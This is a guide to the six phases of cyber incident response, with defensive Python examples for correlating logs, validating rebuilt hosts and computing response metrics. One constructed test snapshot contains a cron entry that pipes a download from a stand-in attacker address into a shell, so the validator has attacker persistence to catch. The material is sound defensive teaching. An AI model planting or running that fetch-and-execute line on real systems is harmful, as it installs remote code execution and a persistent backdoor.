
Incident response is the process by which an organization identifies, prioritizes, contains and eradicates cyberattacks. Its goal is to make sure the organization becomes aware of significant security incidents and acts quickly to stop the attacker, minimize the damage caused, and prevent follow-on attacks or similar incidents in the future.

A successful incident response process identifies attacks and deals with them as effectively and as early as possible. The objective of incident response is to minimize the following:

  • Number of systems and users affected by a breach
  • Damage inflicted to the organization
  • Dwell time of attackers in the corporate network
  • Time required to restore normal operations
  • Cost of mitigation and clean-up efforts
  • Liability and damage caused to third parties such as customers

Incident Response Steps

Step 1: Preparation

The goal of the preparation stage is to ensure that the organization can comprehensively respond to an incident at a moment’s notice.

Below are some items that should be prepared in advance:

Policy : define the principles, rules and practices that guide security processes. Make the policy highly visible to both employees and users.
Response Plan/Strategy : create a plan for incident handling, with prioritization of incidents based on organizational impact.
Communication : create a communication plan that states which CSIRT members should be contacted during an incident, for what reasons, and when they can be contacted.
Documentation : documentation should answer the questions Who, What, When, Where, Why, and How. Any information you collect about the incident can also be used for lessons learned and to improve your incident response process.
Team : build a CSIRT with all relevant skills, not just security. Include individuals with expertise in security but also IT operations, legal, human resources, and public relations, all of whom can be instrumental in dealing with and mitigating an attack.
Access control : make sure that CSIRT staff have the permissions they need to do their job. A good practice is to have network administrators grant additional permissions to CSIRT member accounts as part of the incident response plan, and revoke them when the incident is over, so that elevated access does not persist beyond the response.
Training : ensure initial and ongoing training for all CSIRT members on incident response processes, technical skills, and relevant cyberattack patterns and techniques. Carry out drills at regular intervals to ensure that everyone in the CSIRT knows what they need to do and is able to perform their duties during a real incident.
Tools : evaluate, select and deploy software and hardware that can help respond to an incident more effectively.

Step 2: Identification

This step covers detecting a deviation from normal operations, deciding whether that deviation is an incident, and, if it is, determining its scope. It requires gathering events from sources such as log files, error messages, intrusion detection systems and firewalls, which may provide the evidence needed to decide whether an event is an incident.

The identification step includes the following elements:

  • Setting up monitoring for all sensitive IT systems and infrastructure.
  • Analyzing events from multiple sources including log files, error messages, and alerts from security tools.
  • Identifying an incident by correlating data from multiple sources, and reporting it as soon as possible.
  • Notifying CSIRT members and establishing communication with a designated command center.
  • Documenting everything that incident responders do as part of the response, answering the Who, What, When, Where, Why, and How questions.
  • Maintaining threat prevention and detection capabilities across all main attack vectors.
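The correlation step above is where most of the judgement happens: a single failed login or a single IDS alert is an event, but the same source address failing repeatedly, then succeeding, then receiving an outbound connection from the host it logged into is an incident. The script below is an added example (not code from the original page) that runs that rule over three constructed log sources. The log line formats, the `ssh-bruteforce` rule name, the addresses and the thresholds are all assumptions made for the illustration; the output is an incident record that already answers Who, What, When and Where.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events from three sources. The line formats are simplified
# assumptions for this example, not any product's real output.
AUTH_LOG = """\
2024-05-02T10:00:01 sshd[411]: Failed password for admin from 203.0.113.7 port 51000
2024-05-02T10:00:03 sshd[411]: Failed password for admin from 203.0.113.7 port 51001
2024-05-02T10:00:05 sshd[411]: Failed password for admin from 203.0.113.7 port 51002
2024-05-02T10:00:08 sshd[411]: Failed password for root from 203.0.113.7 port 51003
2024-05-02T10:00:12 sshd[411]: Accepted password for admin from 203.0.113.7 port 51004
2024-05-02T10:05:30 sshd[502]: Accepted publickey for deploy from 198.51.100.9 port 40000
"""
FIREWALL_LOG = """\
2024-05-02T10:00:10 fw ALLOW src=203.0.113.7 dst=10.0.0.5 dport=22
2024-05-02T10:02:40 fw ALLOW src=10.0.0.5 dst=203.0.113.7 dport=4444
"""
IDS_LOG = """\
2024-05-02T10:00:09 ids alert rule=ssh-bruteforce src=203.0.113.7 dst=10.0.0.5
"""

AUTH_RE = re.compile(r"^(\S+) sshd\[\d+\]: (Failed|Accepted) \w+ for (\S+) from (\S+) port \d+")
FW_RE = re.compile(r"^(\S+) fw (ALLOW|DENY) src=(\S+) dst=(\S+) dport=(\d+)")
IDS_RE = re.compile(r"^(\S+) ids alert rule=(\S+) src=(\S+) dst=(\S+)")


def parse_auth(text):
    """Authentication log -> list of {ts, outcome, user, src}; unmatched lines are skipped."""
    out = []
    for line in text.splitlines():
        m = AUTH_RE.match(line)
        if m:
            ts, outcome, user, src = m.groups()
            out.append({"ts": datetime.fromisoformat(ts), "outcome": outcome, "user": user, "src": src})
    return out


def parse_fw(text):
    """Firewall log -> list of {ts, action, src, dst, dport}."""
    out = []
    for line in text.splitlines():
        m = FW_RE.match(line)
        if m:
            ts, action, src, dst, dport = m.groups()
            out.append({"ts": datetime.fromisoformat(ts), "action": action,
                        "src": src, "dst": dst, "dport": int(dport)})
    return out


def parse_ids(text):
    """IDS alert log -> list of {ts, rule, src, dst}."""
    out = []
    for line in text.splitlines():
        m = IDS_RE.match(line)
        if m:
            ts, rule, src, dst = m.groups()
            out.append({"ts": datetime.fromisoformat(ts), "rule": rule, "src": src, "dst": dst})
    return out


def correlate(auth, fw, ids, min_failures=3, window=timedelta(minutes=5)):
    """Correlate the three sources and return an incident record, or None.

    Rule: at least `min_failures` failed logins from one source address within
    `window`, followed by a successful login from the same address. IDS alerts
    from that address corroborate and identify the victim host; an outbound
    connection from the victim back to the attacker after the login raises the
    severity (possible reverse shell or C2 channel).
    """
    failures = defaultdict(list)
    for e in auth:
        if e["outcome"] == "Failed":
            failures[e["src"]].append(e["ts"])

    for e in auth:
        if e["outcome"] != "Accepted":
            continue
        recent = [t for t in failures[e["src"]] if e["ts"] - window <= t <= e["ts"]]
        if len(recent) < min_failures:
            continue
        attacker = e["src"]
        evidence = [f"auth: {len(recent)} failed logins from {attacker} then Accepted for {e['user']} at {e['ts']}"]
        victims = set()
        for a in ids:
            if a["src"] == attacker:
                victims.add(a["dst"])
                evidence.append(f"ids: {a['rule']} {a['src']} -> {a['dst']} at {a['ts']}")
        outbound = False
        for f in fw:
            if f["src"] in victims and f["dst"] == attacker and f["ts"] > e["ts"]:
                outbound = True
                evidence.append(f"fw: outbound {f['src']} -> {f['dst']}:{f['dport']} at {f['ts']}")
        return {
            "who": attacker,
            "what": "credential brute force followed by successful login"
                    + (" and outbound connection to attacker" if outbound else ""),
            "when": min(recent).isoformat(),
            "where": sorted(victims),
            "severity": "high" if outbound else "medium",
            "evidence": evidence,
        }
    return None


if __name__ == "__main__":
    incident = correlate(parse_auth(AUTH_LOG), parse_fw(FIREWALL_LOG), parse_ids(IDS_LOG))
    for k, v in incident.items():
        print(f"{k}: {v}")
```

The benign `deploy` login at 10:05:30 produces no incident because nothing precedes it; the `admin` login does, and the firewall line showing 10.0.0.5 connecting back to the attacker on port 4444 is what turns a medium into a high. In a real deployment the three parsers would be replaced by the SIEM's normalized events, but the correlation logic is the same.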

Step 3: Containment

The primary purpose of this phase is to limit the damage from the current security incident and prevent any further damage. Several steps are necessary to fully mitigate the incident while also preserving evidence that may be needed for prosecution.

The containment step includes the following:

Short-term containment : limiting the damage as soon as possible, usually by isolating network segments, taking a compromised production server offline and routing traffic to a failover.

System backup : taking a forensic image of the affected system(s), and only then wiping and reimaging them. This preserves evidence from the attack that can be used in court, and also for further investigation of the incident and lessons learned. Note that powering a machine off destroys its volatile state, so if memory contents are needed (running processes, network connections, decrypted data) capture a memory image before the machine is shut down.

Long-term containment : applying temporary fixes that make it possible to bring production systems back up. The primary focus is removing accounts or backdoors left by attackers on the systems, and addressing the root cause, for example fixing a broken authentication mechanism or patching the vulnerability that led to the attack.

Step 4: Eradication

This phase covers the actual removal of attacker artifacts and the restoration of affected systems. Eradication removes malware or other artifacts introduced by the attack and fully restores all affected systems.

The Eradication process involves:

Reimaging : complete wipe and re-image of affected system hard drives to ensure any malicious content is removed.

Preventing the root cause : understanding what caused the incident and preventing future compromise, for example by patching the vulnerability the attacker exploited.

Applying basic security best practices : for example, upgrading old software versions and disabling unused services.

Scan for malware : use anti-malware software, or Next-Generation Antivirus (NGAV) if available, to scan affected systems and ensure all malicious content is removed.

Step 5: Recovery

The purpose of this phase is to bring affected systems back into the production environment carefully, so that doing so does not lead to another incident. It is essential to test, monitor, and validate the systems being put back into production to verify that they are not being reinfected by malware or compromised by some other means.

Some of the important decisions to make during this phase are:

  • Time and date to restore operations. It is vital that the system operators/owners make the final decision, based on the advice of the CSIRT.
  • How to test and verify that the compromised systems are clean and fully functional.
  • The duration of monitoring to observe for abnormal behaviors.
  • The tools to test, monitor, and validate system behavior.
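One concrete way to "test and verify that the compromised systems are clean" is to compare a snapshot of the rebuilt host against the golden image it should have been built from, and separately against the indicators found during the investigation. The script below is an added example, not code from the original page; the baseline, the snapshot format, the file contents used to derive hashes and the indicators are all constructed for the illustration. The separate IOC check matters because a baseline captured after the compromise would silently bless the attacker's persistence.

```python
import hashlib


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Golden baseline: what a freshly built host of this role should look like.
# Constructed assumption; in practice it comes from the image build pipeline.
GOLDEN = {
    "listening_ports": {22, 443},
    "services": {"sshd", "nginx", "chronyd"},
    "local_users": {"root", "deploy"},
    "cron_entries": {"0 3 * * * /usr/local/bin/backup.sh"},
    "file_hashes": {
        "/usr/sbin/sshd": sha256(b"golden sshd binary"),
        "/usr/sbin/nginx": sha256(b"golden nginx binary"),
    },
}

# Indicators observed during the investigation of this incident (constructed).
INCIDENT_IOCS = {
    "users": {"support"},
    "ports": {4444},
    "cron_patterns": ("203.0.113.7",),
}


def validate_host(snapshot, golden=GOLDEN, iocs=INCIDENT_IOCS):
    """Compare a candidate host snapshot to the golden baseline and to known IOCs.

    Returns (ready, findings): ready is True only when there are no findings.
    Both additions and removals relative to the baseline are reported, since a
    missing monitoring agent is as relevant as an extra listener.
    """
    findings = []
    for key in ("listening_ports", "services", "local_users", "cron_entries"):
        observed = set(snapshot.get(key, set()))
        for item in sorted(observed - golden[key], key=str):
            findings.append(f"unexpected {key}: {item}")
        for item in sorted(golden[key] - observed, key=str):
            findings.append(f"missing {key}: {item}")

    for path, expected in golden["file_hashes"].items():
        if snapshot.get("file_hashes", {}).get(path) != expected:
            findings.append(f"hash mismatch: {path}")

    # Incident-specific indicators, checked explicitly so they are never masked
    # by a baseline that was itself taken after the compromise.
    for u in sorted(iocs["users"] & set(snapshot.get("local_users", set()))):
        findings.append(f"IOC user present: {u}")
    for p in sorted(iocs["ports"] & set(snapshot.get("listening_ports", set()))):
        findings.append(f"IOC port listening: {p}")
    for entry in sorted(snapshot.get("cron_entries", set())):
        if any(pat in entry for pat in iocs["cron_patterns"]):
            findings.append(f"IOC cron entry: {entry}")

    return (not findings, findings)


# Constructed snapshots: one host rebuilt from the golden image, and one
# "restored" from a backup that was taken after the attacker was already in.
CLEAN_HOST = {
    "listening_ports": {22, 443},
    "services": {"sshd", "nginx", "chronyd"},
    "local_users": {"root", "deploy"},
    "cron_entries": {"0 3 * * * /usr/local/bin/backup.sh"},
    "file_hashes": {
        "/usr/sbin/sshd": sha256(b"golden sshd binary"),
        "/usr/sbin/nginx": sha256(b"golden nginx binary"),
    },
}
DIRTY_HOST = {
    "listening_ports": {22, 443, 4444},
    "services": {"sshd", "nginx", "chronyd"},
    "local_users": {"root", "deploy", "support"},
    "cron_entries": {
        "0 3 * * * /usr/local/bin/backup.sh",
        "*/5 * * * * curl http://203.0.113.7/a | sh",
    },
    "file_hashes": {
        "/usr/sbin/sshd": sha256(b"trojaned sshd binary"),
        "/usr/sbin/nginx": sha256(b"golden nginx binary"),
    },
}

if __name__ == "__main__":
    for name, host in (("clean", CLEAN_HOST), ("dirty", DIRTY_HOST)):
        ready, findings = validate_host(host)
        print(f"{name}: ready={ready}")
        for f in findings:
            print("  -", f)
```

The snapshot itself would be collected on the candidate host (listening sockets, enabled services, local accounts, cron, hashes of critical binaries) and carried to the validation system, so that the check does not depend on tooling running on a machine that is not yet trusted. The same snapshot, taken again during the post-recovery monitoring window, gives the "duration of monitoring" decision something concrete to compare against.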

Step 6: Lessons Learned

The purpose of this phase is to complete any documentation that was not done during the incident, as well as any additional documentation that may be useful in future incidents. The documentation should also be written up as a report that answers the Who, What, When, Where, Why, and How questions that may come up during the lessons learned meeting. The overall goal is to learn from the incidents that occurred within the organization, improve the team's performance, and provide reference material in the event of a similar incident. No later than two weeks after the end of the incident, the CSIRT should compile all relevant information about the incident and extract lessons that can help with future incident response activity.

The lessons learned process includes:

Completing documentation : it is never possible to document every aspect of an incident while it is going on, and comprehensive documentation is essential for identifying lessons for next time.

Publishing an incident report : the report should provide a play-by-play review of the entire incident and answer the Who, What, When, Where, Why, and How questions.

General format for the incident report:

  • When was the problem first detected and by whom
  • The scope of the incident
  • How it was contained and eradicated
  • Work performed during recovery
  • Areas where the CSIRT was effective
  • Areas that need improvement

Identify ways to improve CSIRT performance : extract items from the incident report that were not handled correctly and can be improved for next time.

Establish a benchmark for comparison : derive metrics from the incident report that you can use to guide you in future incidents.

Lessons learned meeting : conduct a meeting with the CSIRT team and other stakeholders to discuss the incident and cement lessons learned that can be implemented immediately.
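The "benchmark for comparison" is only useful if the same metrics are derived the same way from every incident report. The script below is an added example (not from the original page) that turns the report's timeline into the quantities the introduction says incident response should minimize: dwell time, time to detect, time to notify the CSIRT, time to contain, time to eradicate and time to recover. The milestone names, the timeline values and the benchmark targets are assumptions constructed for the illustration; dwell time is measured here from initial compromise to containment.

```python
from datetime import datetime

# Milestone order recorded for every incident (assumed convention for this example).
MILESTONES = ["initial_compromise", "detected", "csirt_notified",
              "contained", "eradicated", "recovered"]

# Constructed timeline for one incident. initial_compromise comes from the
# forensic evidence; the remaining times from the CSIRT's own action log.
TIMELINE = {
    "initial_compromise": "2024-05-02T10:00:12",
    "detected": "2024-05-02T10:02:12",
    "csirt_notified": "2024-05-02T10:20:12",
    "contained": "2024-05-02T11:00:12",
    "eradicated": "2024-05-03T09:00:12",
    "recovered": "2024-05-03T15:00:12",
}

# Targets in minutes, e.g. derived from previous incidents (assumed values).
BENCHMARK = {
    "time_to_detect_min": 60,
    "time_to_notify_min": 15,
    "time_to_contain_min": 120,
    "time_to_eradicate_min": 1440,
    "time_to_recover_min": 1440,
}


def incident_metrics(timeline):
    """Derive response metrics (in minutes) from a milestone timeline.

    Raises ValueError if a milestone is missing or the milestones are out of
    order, so that a mis-recorded report cannot silently produce a negative
    or meaningless metric.
    """
    missing = [m for m in MILESTONES if m not in timeline]
    if missing:
        raise ValueError(f"missing milestones: {missing}")
    t = {m: datetime.fromisoformat(timeline[m]) for m in MILESTONES}
    for earlier, later in zip(MILESTONES, MILESTONES[1:]):
        if t[later] < t[earlier]:
            raise ValueError(f"{later} is recorded before {earlier}")

    def minutes(a, b):
        return (t[b] - t[a]).total_seconds() / 60

    return {
        "dwell_time_min": minutes("initial_compromise", "contained"),
        "time_to_detect_min": minutes("initial_compromise", "detected"),
        "time_to_notify_min": minutes("detected", "csirt_notified"),
        "time_to_contain_min": minutes("detected", "contained"),
        "time_to_eradicate_min": minutes("contained", "eradicated"),
        "time_to_recover_min": minutes("detected", "recovered"),
    }


def missed_targets(metrics, benchmark=BENCHMARK):
    """Names of the metrics that exceeded their benchmark target, sorted."""
    return sorted(name for name, target in benchmark.items() if metrics[name] > target)


if __name__ == "__main__":
    m = incident_metrics(TIMELINE)
    for name, value in m.items():
        print(f"{name:>22}: {value:8.1f}")
    print("missed targets:", missed_targets(m))
```

For the constructed timeline the detection was fast (2 minutes) but it took 18 minutes to reach the CSIRT and nearly 29 hours to recover, so the two items that belong in "areas that need improvement" are the notification path and the recovery work, not detection. Running the same function over every past report gives the benchmark the next lessons learned meeting compares against.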
